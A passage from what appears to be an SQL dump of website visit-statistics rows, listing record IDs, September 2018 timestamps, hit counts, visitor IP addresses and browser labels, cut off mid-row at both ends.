967187,1,1,0,0,'54.36.149.48','other'),(308360,1537967217,1,1,0,0,'54.36.148.100','other'),(308361,1537967266,1,1,0,0,'54.36.148.60','other'),(308362,1537967460,1,1,0,0,'54.36.148.198','other'),(308363,1537967748,1,1,0,0,'54.36.148.218','other'),(308364,1537967808,1,1,0,0,'216.244.66.241','other'),(308365,1537968348,1,1,0,0,'54.36.149.25','other'),(308366,1537968896,1,1,0,0,'54.36.148.226','other'),(308367,1537968908,1,1,0,0,'54.36.148.208','other'),(308368,1537968912,1,1,0,0,'54.36.149.106','other'),(308369,1537969036,2,2,0,0,'66.249.64.131','chrome'),(308370,1537969227,1,1,0,0,'54.36.148.10','other'),(308371,1537969417,1,1,0,0,'54.36.149.32','other'),(308372,1537969546,1,1,0,0,'54.36.149.19','other'),(308373,1537969580,1,1,0,0,'54.36.148.242','other'),(308374,1537969613,1,1,0,0,'54.36.148.160','other'),(308375,1537969984,1,1,0,0,'39.104.233.168','other'),(308376,1537970088,1,1,0,0,'46.4.63.250','other'),(308377,1537970118,1,1,0,0,'8.29.198.26','other'),(308378,1537970372,1,1,0,0,'8.29.198.25','other'),(308379,1537970719,2,2,0,0,'216.244.66.241','other'),(308380,1537971049,1,1,0,0,'54.36.148.207','other'),(308381,1537971209,1,1,0,0,'54.36.148.190','other'),(308382,1537971479,1,1,0,0,'54.36.148.130','other'),(308383,1537971658,1,1,0,0,'54.36.149.67','other'),(308384,1537972229,1,1,0,0,'37.54.203.249','chrome'),(308385,1537972242,1,1,0,0,'54.36.148.65','other'),(308386,1537972640,1,1,0,0,'54.36.148.171','other'),(308387,1537972666,1,1,0,0,'54.36.149.66','other'),(308388,1537972838,1,1,0,0,'54.36.148.79','other'),(308389,1537973129,1,1,0,0,'54.36.149.92','other'),(308390,1537973785,1,1,0,0,'54.36.149.95','other'),(308391,1537974135,2,2,0,0,'66.249.64.131','chrome'),(308392,1537974280,1,1,0,0,'54.36.148.240','other'),(308393,1537974527,1,1,0,0,'54.36.148.138','other'),(308394,1537974669,1,1,0,0,'8.29.198.27','other'),(308395,1537974674,1,1,0,0,'54.165.59.7','other'),(308396,1537974744,1,1,0,0,'54.36.149.58','other'),(308397,1537974991,1,1,0,0,'142.122.65.199','chrome'),(308398,1537975036,1,1,0,0,'54.36.149.69','other'),(308399,1537975289,1,1,0,0,'54.36.148.153','other'),(308400,1537975325,1,1,0,0,'54.36.148.109','other'),(308401,1537975928,1,1,0,0,'54.36.149.65','other'),(308402,1537975966,1,1,0,0,'54.36.148.235','other'),(308403,1537976282,1,1,0,0,'54.36.148.34','other'),(308404,1537976448,1,1,0,0,'54.36.148.75','other'),(308405,1537976689,1,1,0,0,'54.36.148.253','other'),(308406,1537976882,1,1,0,0,'54.36.148.167','other'),(308407,1537976924,1,1,0,0,'54.36.149.17','other'),(308408,1537978203,1,1,0,0,'54.36.149.78','other'),(308409,1537978232,1,1,0,0,'54.36.148.80','other'),(308410,1537978452,1,1,0,0,'213.180.203.37','other'),(308411,1537978484,1,1,0,0,'54.36.149.7','other'),(308412,1537978550,1,1,0,0,'178.154.171.86','other'),(308413,1537978623,1,1,0,0,'54.36.149.94','other'),(308414,1537978635,1,1,0,0,'34.254.158.61','chrome'),(308415,1537978660,1,1,0,0,'54.36.148.83','other'),(308416,1537978686,1,0,1,0,'66.249.64.135',''),(308417,1537978861,1,1,0,0,'178.154.171.88','other'),(308418,1537979051,1,1,0,0,'54.36.149.36','other'),(308419,1537979055,1,1,0,0,'54.36.148.37','other'),(308420,1537979231,1,1,0,0,'54.36.148.36','other'),(308421,1537979263,1,1,0,0,'54.36.148.52','other'),(308422,1537979643,1,1,0,0,'54.36.148.40','other'),(308423,1537979726,1,1,0,0,'54.36.148.20','other'),(308424,1537979759,1,1,0,0,'66.249.64.131','chrome'),(308425,1537979820,1,1,0,0,'54.36.148.170','other'),(308426,1537980214,1,1,0,0,'54.36.148.106','other'),(308427,1537980363,1,1,0,0,'54.36.148.111','other'),(308428,1537980695,1,1,0,0,'54.36.148.228','other'),(308429,1537980833,1,1,0,0,'54.36.149.1','other'),(308430,1537980952,1,1,0,0,'8.29.198.27','other'),(308431,1537981180,1,1,0,0,'54.36.148.253','other'),(308432,1537981204,1,1,0,0,'8.29.198.26','other'),(308433,1537981545,1,1,0,0,'54.36.148.14','other'),(308434,1537981552,1,1,0,0,'54.36.148.33','other'),(308435,1537981581,1,1,0,0,'54.36.148.251','other'),(308436,1537981728,1,1,0,0,'54.36.148.160','other'),(308437,1537981880,2,2,0,0,'54.36.148.55','other'),(308438,1537981881,1,1,0,0,'54.36.148.188','other'),(308439,1537982140,1,1,0,0,'66.249.64.135','chrome'),(308440,1537982383,1,1,0,0,'54.36.149.54','other'),(308441,1537982394,1,1,0,0,'54.36.148.247','other'),(308442,1537982843,1,1,0,0,'207.46.13.98','other'),(308443,1537983151,6,6,0,0,'216.244.66.241','other'),(308444,1537983208,1,1,0,0,'66.249.70.29','chrome'),(308445,1537983220,1,1,0,0,'54.36.148.197','other'),(308446,1537983329,1,1,0,0,'54.36.149.21','other'),(308447,1537983483,1,1,0,0,'5.9.70.72','other'),(308448,1537983934,1,1,0,0,'54.36.149.48','other'),(308449,1537984010,1,1,0,0,'54.36.148.106','other'),(308450,1537984038,1,1,0,0,'207.46.13.233','other'),(308451,1537984047,1,1,0,0,'54.36.148.55','other'),(308452,1537984186,1,1,0,0,'216.244.66.241','other'),(308453,1537984200,1,1,0,0,'54.36.148.140','other'),(308454,1537984259,1,1,0,0,'54.36.149.102','other'),(308455,1537984878,1,1,0,0,'54.36.149.55','other'),(308456,1537985274,1,1,0,0,'54.36.149.69','other'),(308457,1537985432,1,1,0,0,'54.36.148.164','other'),(308458,1537985497,1,1,0,0,'8.29.198.26','other'),(308459,1537985500,1,1,0,0,'54.36.149.3','other'),(308460,1537985819,1,1,0,0,'54.36.148.251','other'),(308461,1537986395,1,1,0,0,'54.36.148.165','other'),(308462,1537986445,1,1,0,0,'54.36.148.159','other'),(308463,1537986476,1,1,0,0,'54.36.148.216','other'),(308464,1537986539,1,1,0,0,'54.36.148.116','other'),(308465,1537986549,1,1,0,0,'216.244.66.241','other'),(308466,1537986573,1,1,0,0,'66.249.70.29','chrome'),(308467,1537986657,1,1,0,0,'91.247.38.43','firefox'),(308468,1537987361,1,1,0,0,'54.36.148.238','other'),(308469,1537987377,1,1,0,0,'54.36.148.172','other'),(308470,1537987434,1,1,0,0,'54.165.59.7','other'),(308471,1537987584,2,2,0,0,'87.250.224.46','other'),(308472,1537987758,2,2,0,0,'141.8.142.74','other'),(308473,1537987761,2,2,0,0,'178.154.171.88','other'),(308474,1537987864,1,1,0,0,'37.9.113.182','other'),(308475,1537987867,1,1,0,0,'54.36.149.31','other'),(308476,1537987914,1,1,0,0,'54.36.148.151','other'),(308477,1537987951,1,1,0,0,'178.154.244.34','other'),(308478,1537988235,1,1,0,0,'178.154.244.62','other'),(308479,1537988269,1,1,0,0,'54.36.149.73','other'),(308480,1537988271,1,1,0,0,'54.36.149.33','other'),(308481,1537988342,2,2,0,0,'216.244.66.241','other'),(308482,1537988352,1,1,0,0,'54.36.148.113','other'),(308483,1537988640,1,1,0,0,'54.36.149.10','other'),(308484,1537988890,1,1,0,0,'54.36.148.191','other'),(308485,1537989081,1,1,0,0,'54.36.148.147','other'),(308486,1537989180,22,22,0,0,'69.30.210.242','other'),(308487,1537989195,1,1,0,0,'54.36.148.116','other'),(308488,1537989226,1,1,0,0,'95.163.255.190','other'),(308489,1537989415,1,1,0,0,'157.55.39.131','other'),(308490,1537989485,1,1,0,0,'54.36.148.54','other'),(308491,1537989509,2,2,0,0,'54.36.149.65','other'),(308492,1537989621,2,2,0,0,'54.36.148.70','other'),(308493,1537990433,1,1,0,0,'54.36.148.51','other'),(308494,1537990525,1,1,0,0,'54.36.149.2','other'),(308495,1537990534,1,1,0,0,'54.36.148.130','other'),(308496,1537990541,1,1,0,0,'54.36.148.40','other'),(308497,1537991075,1,1,0,0,'54.36.148.135','other'),(308498,1537991139,1,1,0,0,'54.36.149.11','other'),(308499,1537991264,1,1,0,0,'54.36.148.76','other'),(308500,1537991518,1,1,0,0,'54.36.149.27','other'),(308501,1537991548,1,1,0,0,'54.36.148.243','other'),(308502,1537991780,1,1,0,0,'8.29.198.25','other'),(308503,1537991782,1,1,0,0,'66.249.64.135','chrome'),(308504,1537991851,1,1,0,0,'54.36.148.236','other'),(308505,1537991861,1,1,0,0,'54.36.148.133','other'),(308506,1537991868,1,1,0,0,'54.36.148.173','other'),(308507,1537991892,1,1,0,0,'46.211.80.129','other'),(308508,1537991948,1,1,0,0,'66.102.9.35','chrome'),(308509,1537992049,1,1,0,0,'8.29.198.26','other'),(308510,1537992098,1,1,0,0,'95.163.255.155','other'),(308511,1537992260,1,1,0,0,'54.36.148.11','other'),(308512,1537992270,1,1,0,0,'54.36.148.169','other'),(308513,1537992406,1,1,0,0,'54.36.148.90','other'),(308514,1537992777,1,1,0,0,'54.36.148.46','other'),(308515,1537992906,1,1,0,0,'54.36.149.92','other'),(308516,1537992914,1,1,0,0,'54.36.148.50','other'),(308517,1537993172,1,1,0,0,'207.46.13.179','other'),(308518,1537993562,1,1,0,0,'54.36.148.206','other'),(308519,1537993663,2,2,0,0,'5.9.66.153','other'),(308520,1537993883,2,2,0,0,'216.244.66.241','other'),(308521,1537994045,1,1,0,0,'54.36.148.254','other'),(308522,1537994368,1,1,0,0,'54.36.148.166','other'),(308523,1537994805,1,1,0,0,'157.55.39.131','other'),(308524,1537995124,1,1,0,0,'46.188.22.216','chrome'),(308525,1537995165,1,1,0,0,'54.36.148.225','other'),(308526,1537995191,1,1,0,0,'54.36.149.17','other'),(308527,1537995327,1,1,0,0,'54.36.148.29','other'),(308528,1537995396,1,1,0,0,'207.46.13.233','other'),(308529,1537995425,1,1,0,0,'54.36.149.46','other'),(308530,1537995549,1,1,0,0,'54.36.148.201','other'),(308531,1537995865,1,0,1,0,'66.249.64.137',''),(308532,1537995910,1,1,0,0,'54.36.148.61','other'),(308533,1537995960,2,2,0,0,'87.250.224.46','other'),(308534,1537996080,2,2,0,0,'178.154.244.62','other'),(308535,1537996129,1,1,0,0,'178.154.244.34','other'),(308536,1537996183,1,1,0,0,'178.154.171.88','other'),(308537,1537996287,1,1,0,0,'54.36.148.81','other'),(308538,1537996340,1,1,0,0,'8.29.198.26','other'),(308539,1537996446,1,1,0,0,'54.36.148.27','other'),(308540,1537997150,1,1,0,0,'95.163.255.157','other'),(308541,1537997233,1,1,0,0,'54.36.148.72','other'),(308542,1537997325,1,1,0,0,'54.36.148.117','other'),(308543,1537997339,1,1,0,0,'54.36.149.67','other'),(308544,1537997400,1,1,0,0,'54.36.148.213','other'),(308545,1537997569,1,1,0,0,'141.8.142.74','other'),(308546,1537997784,1,1,0,0,'54.36.148.177','other'),(308547,1537997825,1,1,0,0,'54.36.148.112','other'),(308548,1537997925,1,1,0,0,'54.36.148.98','other'),(308549,1537998097,1,1,0,0,'54.36.149.90','other'),(308550,1537998282,1,1,0,0,'37.9.113.182','other'),(308551,1537998283,1,1,0,0,'37.9.113.115','other'),(308552,1537998326,1,1,0,0,'54.36.148.225','other'),(308553,1537998407,1,1,0,0,'54.36.148.153','other'),(308554,1537998434,1,1,0,0,'54.36.149.65','other'),(308555,1537998584,1,1,0,0,'54.36.148.158','other'),(308556,1537998630,1,1,0,0,'54.36.148.93','other'),(308557,1537998862,1,1,0,0,'54.36.148.204','other'),(308558,1537999041,1,1,0,0,'54.36.148.162','other'),(308559,1537999109,1,1,0,0,'54.36.148.217','other'),(308560,1537999172,2,2,0,0,'54.36.149.25','other'),(308561,1537999364,1,1,0,0,'54.36.148.191','other'),(308562,1537999483,1,1,0,0,'216.244.66.241','other'),(308563,1537999644,1,1,0,0,'54.36.148.35','other'),(308564,1537999699,1,1,0,0,'54.36.148.111','other'),(308565,1537999739,1,1,0,0,'54.36.149.85','other'),(308566,1537999821,1,1,0,0,'54.36.149.84','other'),(308567,1537999846,1,1,0,0,'54.36.148.211','other'),(308568,1537999874,1,1,0,0,'54.36.148.88','other'),(308569,1537999945,1,1,0,0,'54.36.149.71','other'),(308570,1538000384,1,1,0,0,'54.36.148.45','other'),(308571,1538000405,1,1,0,0,'54.36.149.11','other'),(308572,1538000540,1,1,0,0,'54.36.148.223','other'),(308573,1538001241,1,1,0,0,'54.36.148.106','other'),(308574,1538001366,1,1,0,0,'54.36.148.195','other'),(308575,1538001453,1,1,0,0,'95.163.255.154','other'),(308576,1538001601,1,1,0,0,'54.36.148.108','other'),(308577,1538001630,1,1,0,0,'54.36.149.79','other'),(308578,1538001758,1,1,0,0,'54.36.148.219','other'),(308579,1538001998,1,1,0,0,'54.36.149.81','other'),(308580,1538002233,1,1,0,0,'54.36.148.25','other'),(308581,1538002549,1,1,0,0,'54.36.148.124','other'),(308582,1538002559,1,1,0,0,'207.46.13.98','other'),(308583,1538002610,2,2,0,0,'8.29.198.25','other'),(308584,1538002821,1,1,0,0,'54.36.149.7','other'),(308585,1538002860,1,1,0,0,'54.36.149.107','other'),(308586,1538003043,1,1,0,0,'54.36.148.23','other'),(308587,1538003129,1,1,0,0,'54.36.149.6','other'),(308588,1538003138,1,1,0,0,'54.36.149.75','other'),(308589,1538003356,1,1,0,0,'54.36.148.131','other'),(308590,1538003435,1,1,0,0,'54.36.148.148','other'),(308591,1538003654,2,2,0,0,'54.36.148.165','other'),(308592,1538003709,1,1,0,0,'54.36.148.255','other'),(308593,1538003970,1,1,0,0,'54.36.148.185','other'),(308594,1538004071,1,1,0,0,'54.36.148.122','other'),(308595,1538004100,1,1,0,0,'54.36.149.11','other'),(308596,1538004315,1,1,0,0,'54.36.149.80','other'),(308597,1538004333,1,1,0,0,'54.36.148.97','other'),(308598,1538004588,1,1,0,0,'54.36.148.75','other'),(308599,1538004995,1,1,0,0,'54.36.148.159','other'),(308600,1538005000,1,1,0,0,'54.36.149.73','other'),(308601,1538005219,1,1,0,0,'54.36.149.43','other'),(308602,1538005416,1,1,0,0,'66.249.64.135','chrome'),(308603,1538006239,1,1,0,0,'54.36.148.177','other'),(308604,1538006603,1,1,0,0,'66.249.64.131','chrome'),(308605,1538006742,1,1,0,0,'54.36.149.59','other'),(308606,1538006789,1,1,0,0,'54.36.148.114','other'),(308607,1538006795,1,1,0,0,'54.36.148.241','other'),(308608,1538006858,3,3,0,0,'216.244.66.241','other'),(308609,1538007172,1,1,0,0,'8.29.198.26','other'),(308610,1538007272,1,1,0,0,'54.36.149.80','other'),(308611,1538007372,1,1,0,0,'54.36.149.96','other'),(308612,1538007722,1,1,0,0,'54.36.149.53','other'),(308613,1538007978,1,1,0,0,'54.36.148.72','other'),(308614,1538008040,1,1,0,0,'95.163.255.150','other'),(308615,1538008225,1,1,0,0,'54.36.148.84','other'),(308616,1538008296,1,1,0,0,'54.36.148.225','other'),(308617,1538008438,1,1,0,0,'54.36.148.215','other'),(308618,1538008466,1,1,0,0,'54.36.148.239','other'),(308619,1538008595,1,1,0,0,'54.36.148.157','other'),(308620,1538008788,1,1,0,0,'54.36.149.68','other'),(308621,1538008922,1,1,0,0,'54.36.148.12','other'),(308622,1538008971,1,1,0,0,'207.46.13.179','other'),(308623,1538009075,1,1,0,0,'54.36.148.49','other'),(308624,1538009250,1,1,0,0,'54.36.148.232','other'),(308625,1538009659,1,1,0,0,'54.36.148.73','other'),(308626,1538009783,1,1,0,0,'216.244.66.241','other'),(308627,1538009803,1,1,0,0,'54.36.149.97','other'),(308628,1538010004,1,0,1,0,'66.249.64.135',''),(308629,1538010126,1,1,0,0,'54.36.148.202','other'),(308630,1538011058,1,1,0,0,'54.36.148.79','other'),(308631,1538011211,1,1,0,0,'54.36.148.120','other'),(308632,1538011245,1,1,0,0,'54.36.148.191','other'),(308633,1538011277,1,1,0,0,'37.9.113.182','other'),(308634,1538011483,1,1,0,0,'66.249.64.135','chrome'),(308635,1538011690,1,1,0,0,'54.36.149.34','other'),(308636,1538011774,1,1,0,0,'37.9.113.110','other'),(308637,1538011977,1,1,0,0,'178.154.244.56','other'),(308638,1538012088,1,1,0,0,'37.9.113.132','other'),(308639,1538012174,1,1,0,0,'54.36.149.31','other'),(308640,1538012903,1,1,0,0,'54.36.148.117','other'),(308641,1538013154,1,1,0,0,'54.36.148.190','other'),(308642,1538013320,1,1,0,0,'54.36.149.6','other'),(308643,1538013446,1,1,0,0,'8.29.198.26','other'),(308644,1538013575,1,1,0,0,'54.36.149.30','other'),(308645,1538013687,1,1,0,0,'54.36.148.91','other'),(308646,1538013724,1,1,0,0,'8.29.198.27','other'),(308647,1538013744,1,1,0,0,'54.36.149.77','other'),(308648,1538013871,1,1,0,0,'54.36.148.167','other'),(308649,1538014072,1,1,0,0,'54.36.148.134','other'),(308650,1538014429,1,1,0,0,'54.36.149.96','other'),(308651,1538014818,1,1,0,0,'54.36.148.13','other'),(308652,1538014904,1,1,0,0,'54.36.149.81','other'),(308653,1538015032,1,1,0,0,'54.36.149.41','other'),(308654,1538015118,1,1,0,0,'54.36.149.47','other'),(308655,1538015526,1,1,0,0,'54.36.148.224','other'),(308656,1538015800,1,1,0,0,'39.104.233.168','other'),(308657,1538015817,1,1,0,0,'54.36.149.101','other'),(308658,1538015953,1,1,0,0,'54.36.148.214','other'),(308659,1538015974,1,1,0,0,'54.36.149.33','other'),(308660,1538015992,1,1,0,0,'54.36.148.159','other'),(308661,1538016148,1,1,0,0,'54.36.149.34','other'),(308662,1538016738,1,1,0,0,'54.36.149.64','other'),(308663,1538016746,1,1,0,0,'216.244.66.241','other'),(308664,1538016910,1,1,0,0,'54.185.102.111','chrome'),(308665,1538017177,1,1,0,0,'54.36.149.6','other'),(308666,1538017223,1,1,0,0,'54.36.148.102','other'),(308667,1538017279,1,1,0,0,'54.36.148.235','other'),(308668,1538017347,1,1,0,0,'54.36.148.135','other'),(308669,1538017656,1,1,0,0,'95.163.255.191','other'),(308670,1538017738,1,1,0,0,'54.36.149.38','other'),(308671,1538017796,1,1,0,0,'54.36.149.97','other'),(308672,1538017812,1,1,0,0,'54.36.149.20','other'),(308673,1538017974,1,1,0,0,'54.36.148.195','other'),(308674,1538017997,1,1,0,0,'8.29.198.26','other'),(308675,1538018004,1,1,0,0,'54.36.148.151','other'),(308676,1538018101,1,1,0,0,'95.163.255.161','other'),(308677,1538018215,1,1,0,0,'54.36.148.248','other'),(308678,1538018447,1,1,0,0,'54.36.149.61','other'),(308679,1538018461,1,1,0,0,'54.36.148.11','other'),(308680,1538018481,1,1,0,0,'54.36.148.106','other'),(308681,1538018639,1,1,0,0,'54.36.148.139','other'),(308682,1538018856,1,1,0,0,'54.36.148.107','other'),(308683,1538019003,1,1,0,0,'54.36.149.9','other'),(308684,1538019017,1,1,0,0,'54.36.149.81','other'),(308685,1538019073,1,1,0,0,'54.36.148.186','other'),(308686,1538019198,1,1,0,0,'51.255.65.46','other'),(308687,1538019463,1,1,0,0,'54.36.149.64','other'),(308688,1538019610,1,1,0,0,'54.36.148.96','other'),(308689,1538019693,1,1,0,0,'54.36.148.211','other'),(308690,1538019852,1,1,0,0,'54.36.148.85','other'),(308691,1538019908,1,1,0,0,'54.36.149.55','other'),(308692,1538019936,1,1,0,0,'54.36.149.65','other'),(308693,1538020182,1,1,0,0,'178.154.171.88','other'),(308694,1538020185,1,1,0,0,'178.154.244.62','other'),(308695,1538020188,1,1,0,0,'37.9.113.110','other'),(308696,1538020289,1,1,0,0,'54.36.148.15','other'),(308697,1538020313,1,1,0,0,'54.36.149.105','other'),(308698,1538020516,1,1,0,0,'54.36.149.56','other'),(308699,1538021036,1,1,0,0,'54.36.149.6','other'),(308700,1538021225,1,1,0,0,'54.36.149.3','other'),(308701,1538021304,1,1,0,0,'54.36.149.102','other'),(308702,1538021363,1,1,0,0,'54.36.148.207','other'),(308703,1538021388,1,1,0,0,'54.36.148.162','other'),(308704,1538021458,1,1,0,0,'54.36.148.110','other'),(308705,1538021495,1,1,0,0,'54.36.148.33','other'),(308706,1538021721,1,1,0,0,'54.36.148.71','other'),(308707,1538021822,1,1,0,0,'54.36.148.47','other'),(308708,1538021939,2,2,0,0,'216.244.66.241','other'),(308709,1538022437,1,1,0,0,'54.36.148.215','other'),(308710,1538022490,1,1,0,0,'54.36.148.155','other'),(308711,1538022494,1,1,0,0,'54.36.148.173','other'),(308712,1538022537,1,1,0,0,'54.36.148.41','other'),(308713,1538022892,1,1,0,0,'95.163.255.158','other'),(308714,1538022986,134,134,0,0,'144.76.96.236','other'),(308715,1538023165,1,1,0,0,'54.36.148.161','other'),(308716,1538023208,20,20,0,0,'5.9.156.121','other'),(308717,1538023277,1,1,0,0,'54.36.148.25','other'),(308718,1538023348,1,1,0,0,'54.36.148.98','other'),(308719,1538024281,1,1,0,0,'8.29.198.25','other'),(308720,1538024364,1,1,0,0,'54.36.148.251','other'),(308721,1538024445,1,1,0,0,'66.249.64.135','chrome'),(308722,1538024558,1,1,0,0,'8.29.198.27','other'),(308723,1538024572,1,1,0,0,'54.36.148.101','other'),(308724,1538024584,1,1,0,0,'66.249.64.137','chrome'),(308725,1538024790,2,2,0,0,'91.196.177.176','chrome'),(308726,1538024961,1,1,0,0,'54.36.149.56','other'),(308727,1538025050,1,1,0,0,'54.36.148.98','other'),(308728,1538025203,1,1,0,0,'54.36.148.241','other'),(308729,1538025327,1,1,0,0,'216.244.66.241','other'),(308730,1538025673,1,1,0,0,'54.36.148.83','other'),(308731,1538025771,1,1,0,0,'54.36.148.216','other'),(308732,1538025811,1,1,0,0,'91.196.178.79','firefox'),(308733,1538025867,1,1,0,0,'54.36.149.80','other'),(308734,1538025924,1,1,0,0,'54.36.149.104','other'),(308735,1538026277,1,1,0,0,'91.196.178.92','firefox'),(308736,1538026280,1,1,0,0,'54.36.148.78','other'),(308737,1538026377,1,1,0,0,'54.36.149.13','other'),(308738,1538026716,1,1,0,0,'91.196.178.94','chrome'),(308739,1538026776,1,1,0,0,'54.36.148.20','other'),(308740,1538026884,1,1,0,0,'54.36.148.25','other'),(308741,1538026891,1,1,0,0,'54.36.149.39','other'),(308742,1538026917,1,1,0,0,'54.36.148.126','other'),(308743,1538026944,1,1,0,0,'54.36.148.61','other'),(308744,1538027083,1,1,0,0,'54.36.148.152','other'),(308745,1538027174,1,1,0,0,'37.53.228.75','chrome'),(308746,1538027227,1,1,0,0,'54.36.148.76','other'),(308747,1538027609,1,1,0,0,'54.36.148.23','other'),(308748,1538027732,1,1,0,0,'54.36.149.75','other'),(308749,1538027878,1,1,0,0,'80.95.44.78','chrome'),(308750,1538027915,1,1,0,0,'91.196.177.176','chrome'),(308751,1538027925,1,1,0,0,'188.163.42.97','chrome'),(308752,1538027939,1,1,0,0,'54.36.148.119','other'),(308753,1538027958,1,1,0,0,'95.163.255.179','other'),(308754,1538028238,1,1,0,0,'54.36.148.84','other'),(308755,1538028343,1,1,0,0,'54.36.148.63','other'),(308756,1538028441,1,1,0,0,'91.196.178.94','chrome'),(308757,1538028571,1,1,0,0,'54.36.149.59','other'),(308758,1538028694,1,1,0,0,'77.93.41.218','chrome'),(308759,1538028818,1,1,0,0,'8.29.198.26','other'),(308760,1538028831,1,1,0,0,'54.36.148.86','other'),(308761,1538028878,1,1,0,0,'91.196.177.176','chrome'),(308762,1538029152,1,1,0,0,'54.36.148.159','other'),(308763,1538029395,1,1,0,0,'54.36.149.11','other'),(308764,1538029403,1,1,0,0,'92.113.189.235','chrome'),(308765,1538029644,1,1,0,0,'216.244.65.3','chrome'),(308766,1538029702,1,1,0,0,'216.244.66.241','other'),(308767,1538029737,1,1,0,0,'54.36.148.189','other'),(308768,1538030095,1,1,0,0,'157.55.39.131','other'),(308769,1538030229,1,1,0,0,'54.36.149.78','other'),(308770,1538030267,2,2,0,0,'91.196.177.46','chrome'),(308771,1538030597,1,1,0,0,'54.36.149.10','other'),(308772,1538030663,1,1,0,0,'66.249.64.135','chrome'),(308773,1538030687,1,1,0,0,'66.249.64.131','chrome'),(308774,1538030816,1,1,0,0,'66.249.64.137','chrome'),(308775,1538030861,1,1,0,0,'91.196.177.176','chrome'),(308776,1538031185,1,1,0,0,'54.36.148.193','other'),(308777,1538031261,1,1,0,0,'207.46.13.233','other'),(308778,1538031267,2,2,0,0,'37.52.23.165','chrome'),(308779,1538031346,1,1,0,0,'54.36.148.116','other'),(308780,1538031428,1,1,0,0,'54.36.149.51','other'),(308781,1538031523,2,2,0,0,'91.196.177.46','chrome'),(308782,1538031668,1,1,0,0,'54.36.149.57','other'),(308783,1538031738,1,1,0,0,'54.36.149.17','other'),(308784,1538031810,1,1,0,0,'54.36.149.101','other'),(308785,1538031906,1,1,0,0,'51.255.65.46','other'),(308786,1538032179,1,1,0,0,'54.36.149.12','other'),(308787,1538032181,1,1,0,0,'91.196.177.176','chrome'),(308788,1538032277,1,1,0,0,'54.36.148.207','other'),(308789,1538032296,1,1,0,0,'54.36.148.200','other'),(308790,1538032431,1,1,0,0,'54.36.149.56','other'),(308791,1538032448,1,1,0,0,'54.36.148.163','other'),(308792,1538032511,1,1,0,0,'216.244.66.241','other'),(308793,1538032639,1,1,0,0,'54.36.149.85','other'),(308794,1538032722,1,1,0,0,'54.36.149.19','other'),(308795,1538032877,1,1,0,0,'54.36.148.47','other'),(308796,1538032889,1,1,0,0,'54.36.149.101','other'),(308797,1538032953,1,1,0,0,'54.36.148.190','other'),(308798,1538033086,1,1,0,0,'54.36.149.34','other'),(308799,1538033315,1,1,0,0,'54.36.148.97','other'),(308800,1538033695,1,1,0,0,'54.36.148.125','other'),(308801,1538033763,1,1,0,0,'54.36.148.124','other'),(308802,1538033986,1,1,0,0,'54.36.148.89','other'),(308803,1538034019,1,1,0,0,'54.36.148.187','other'),(308804,1538034248,1,1,0,0,'95.163.255.189','other'),(308805,1538034279,1,1,0,0,'216.244.66.241','other'),(308806,1538034387,1,1,0,0,'54.36.148.223','other'),(308807,1538034715,1,1,0,0,'54.36.148.151','other'),(308808,1538034809,1,1,0,0,'54.36.149.83','other'),(308809,1538034984,1,1,0,0,'54.36.148.175','other'),(308810,1538035056,1,1,0,0,'54.36.148.63','other'),(308811,1538035079,1,1,0,0,'54.36.149.10','other'),(308812,1538035113,1,1,0,0,'8.29.198.25','other'),(308813,1538035326,1,1,0,0,'54.36.148.148','other'),(308814,1538035408,1,1,0,0,'8.29.198.27','other'),(308815,1538035470,1,1,0,0,'37.52.16.219','chrome'),(308816,1538035666,1,1,0,0,'54.36.148.114','other'),(308817,1538035795,1,0,1,0,'66.249.70.29',''),(308818,1538035797,1,0,1,0,'66.249.70.27',''),(308819,1538035798,1,1,0,0,'54.36.148.70','other'),(308820,1538035864,1,1,0,0,'54.36.149.94','other'),(308821,1538036027,1,1,0,0,'54.36.148.30','other'),(308822,1538036331,1,1,0,0,'54.36.148.203','other'),(308823,1538036690,1,1,0,0,'54.36.148.74','other'),(308824,1538036712,1,1,0,0,'54.36.148.133','other'),(308825,1538036722,1,1,0,0,'54.36.148.11','other'),(308826,1538036816,1,1,0,0,'54.36.148.204','other'),(308827,1538037001,1,1,0,0,'54.36.148.123','other'),(308828,1538037098,1,1,0,0,'95.163.255.177','other'),(308829,1538037114,1,1,0,0,'95.163.255.163','other'),(308830,1538037223,1,1,0,0,'54.36.148.143','other'),(308831,1538037283,1,1,0,0,'54.36.148.243','other'),(308832,1538037459,2,2,0,0,'216.244.66.241','other'),(308833,1538037463,1,1,0,0,'54.36.148.46','other'),(308834,1538037590,1,1,0,0,'54.36.148.18','other'),(308835,1538037644,1,1,0,0,'54.36.148.51','other'),(308836,1538037717,1,1,0,0,'54.36.148.246','other'),(308837,1538037828,1,1,0,0,'157.55.39.131','other'),(308838,1538038170,1,1,0,0,'91.196.178.75','chrome'),(308839,1538038221,1,1,0,0,'34.222.215.2','chrome'),(308840,1538038283,1,1,0,0,'54.36.148.39','other'),(308841,1538038343,1,1,0,0,'207.46.13.179','other'),(308842,1538038597,1,1,0,0,'54.36.148.86','other'),(308843,1538038694,1,1,0,0,'54.36.148.113','other'),(308844,1538038717,1,1,0,0,'54.36.149.89','other'),(308845,1538038764,1,1,0,0,'54.36.148.19','other'),(308846,1538038814,1,1,0,0,'54.36.148.64','other'),(308847,1538039022,1,1,0,0,'54.36.148.53','other'),(308848,1538039216,1,1,0,0,'95.163.255.167','other'),(308849,1538039365,1,1,0,0,'54.36.148.68','other'),(308850,1538039450,1,1,0,0,'54.36.149.30','other'),(308851,1538039496,1,1,0,0,'54.36.149.28','other'),(308852,1538039579,1,1,0,0,'91.196.178.68','chrome'),(308853,1538039652,1,1,0,0,'8.29.198.25','other'),(308854,1538039661,1,1,0,0,'54.36.148.175','other'),(308855,1538039930,1,1,0,0,'54.36.148.125','other'),(308856,1538040123,1,1,0,0,'54.36.148.207','other'),(308857,1538040177,1,1,0,0,'54.36.148.101','other'),(308858,1538040271,2,2,0,0,'54.36.148.48','other'),(308859,1538040477,1,1,0,0,'216.244.66.241','other'),(308860,1538040512,1,1,0,0,'54.36.148.105','other'),(308861,1538040573,1,1,0,0,'54.36.148.191','other'),(308862,1538040836,1,1,0,0,'54.36.149.13','other'),(308863,1538040948,1,1,0,0,'54.36.149.106','other'),(308864,1538041094,1,1,0,0,'54.36.148.80','other'),(308865,1538041096,1,1,0,0,'54.36.148.49','other'),(308866,1538041223,1,1,0,0,'66.249.64.131','chrome'),(308867,1538041632,1,1,0,0,'54.36.149.92','other'),(308868,1538042372,1,1,0,0,'91.196.177.134','chrome'),(308869,1538042391,1,1,0,0,'54.36.148.79','other'),(308870,1538042491,1,1,0,0,'141.8.142.74','other'),(308871,1538042549,1,1,0,0,'54.36.148.114','other'),(308872,1538042618,1,1,0,0,'37.54.178.206','chrome'),(308873,1538042620,1,